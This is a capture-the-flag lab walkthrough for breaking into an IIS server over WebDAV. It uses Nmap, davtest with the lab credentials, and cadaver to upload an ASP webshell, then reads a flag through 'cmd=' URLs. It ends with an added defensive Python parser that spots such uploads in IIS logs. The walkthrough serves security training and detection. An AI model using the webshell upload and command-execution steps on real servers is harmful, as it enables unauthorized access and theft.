Windows IIS Server DAVTest

This document outlines the steps to exploit an IIS server using WebDAV by checking the target IP, running Nmap scans, and utilizing the davtest and cadaver tools to upload a backdoor. After successfully uploading the backdoor, it demonstrates how to access it and read a flag from the C: drive. The document serves as a reference for commands and procedures rather than a comprehensive guide.

Uploaded by

Harlian

Name Windows: IIS Server DAVTest

URL https://attackdefense.com/challengedetails?cid=2317

Type Windows Service Exploitation: IIS

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: Checking the target IP address.

Note: The target IP address is stored in the “target” file.

Command: cat /root/Desktop/target

Step 2: Run an Nmap scan against the target IP.

Command: nmap 10.0.16.177


Step 3: We have discovered that multiple ports are open. We will be focusing on port 80 where
the IIS server is running.

Run the http-enum Nmap script to discover interesting directories.

Command: nmap --script http-enum -sV -p 80 10.0.16.177

The script found the /webdav directory, which returned a 401 (Unauthorized) response.

Step 4: Running davtest tool.

Command: davtest -url http://10.0.16.177/webdav

Notice that the /webdav path is protected with basic authentication. We access the /webdav
path using the provided credentials, i.e. bob:password_123321

Command: davtest -auth bob:password_123321 -url http://10.0.16.177/webdav


Notice that davtest uploaded almost all the important file types to the /webdav directory.
Also, three types of files can be executed, i.e. asp, text, and html.

Step 5: Upload a .asp backdoor to the /webdav directory on the target machine using the
cadaver utility.

The .asp backdoor is present in the “/usr/share/webshells/asp/” directory, i.e.

/usr/share/webshells/asp/webshell.asp

Command: cadaver http://10.0.16.177/webdav


Enter credentials: bob:password_123321

We can interact with the webdav directory using the cadaver tool.

Step 6: Upload the .asp backdoor to the webdav directory on the IIS web server.

Command: put /usr/share/webshells/asp/webshell.asp


ls

We have successfully uploaded the backdoor.

Step 7: Access the backdoor using the Firefox browser.

URL: http://10.0.16.177/webdav/webshell.asp

Enter credentials: bob:password_123321


We can enter Windows commands in the yellow highlighted field.

Check the current running user.

URL: http://10.0.16.177/webdav/webshell.asp?cmd=whoami

We are running as an IIS AppPool identity.

Step 8: Read the flag.

Check the contents of the C:\ drive.

URL: http://10.0.16.177/webdav/webshell.asp?cmd=dir+C%3A%5C

Notice that there is a flag.txt file present in the C:\ drive. Read it.

URL: http://10.0.16.177/webdav/webshell.asp?cmd=type+C%3A%5Cflag.txt

This reveals the flag to us.

Flag: 0cc175b9c0f1b6a831c399e269772661
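
From the defender's side, the upload in Step 6 and the requests in Steps 7 and 8 leave a recognizable sequence in the IIS W3C log: a successful PUT of a script-type file under the WebDAV path, followed by requests to that same file. The following is an added example, not part of the original lab manual; the log lines are constructed, and the extension watch list and function names are assumptions.

```python
# Added example (not from the lab manual): find script files written over
# WebDAV and later requests to them in an IIS W3C log.
SCRIPT_EXTS = (".asp", ".aspx", ".asa", ".cer", ".ashx")  # assumed watch list

# Constructed sample log; column order is taken from the #Fields directive.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip sc-status
2024-01-01 10:00:01 PROPFIND /webdav - - 10.10.0.2 401
2024-01-01 10:00:05 PUT /webdav/notes.txt - bob 10.10.0.2 201
2024-01-01 10:00:09 PUT /webdav/webshell.asp - bob 10.10.0.2 201
2024-01-01 10:01:12 GET /webdav/webshell.asp cmd=whoami bob 10.10.0.2 200
2024-01-01 10:02:30 GET /index.asp - - 10.10.0.9 200
"""


def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields line."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def find_webdav_script_drops(text):
    """Return (uploads, followups): successful PUTs of script-type files, and
    later successful requests to exactly those paths."""
    dropped, uploads, followups = set(), [], []
    for req in parse_w3c(text):
        stem = req["cs-uri-stem"].lower()
        if not req["sc-status"].startswith("2"):
            continue  # rejected requests (e.g. 401) changed nothing
        if req["cs-method"] == "PUT" and stem.endswith(SCRIPT_EXTS):
            dropped.add(stem)
            uploads.append(req)
        elif req["cs-method"] != "PUT" and stem in dropped:
            followups.append(req)
    return uploads, followups


if __name__ == "__main__":
    uploads, followups = find_webdav_script_drops(SAMPLE_LOG)
    for req in uploads:
        print("script written via WebDAV:", req["cs-uri-stem"], "by", req["cs-username"])
    for req in followups:
        print("request to dropped script:", req["cs-uri-stem"], "?", req["cs-uri-query"])
```

The chain in this lab depends on a directory that is both WebDAV-writable and allowed to execute scripts; removing either property from /webdav breaks it.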

References:

1. DAVTest (https://github.com/cldrn/davtest)
2. Cadaver (https://github.com/grimneko/cadaver)
3. ASP Webshell (https://raw.githubusercontent.com/tennc/webshell/master/asp/webshell.asp)
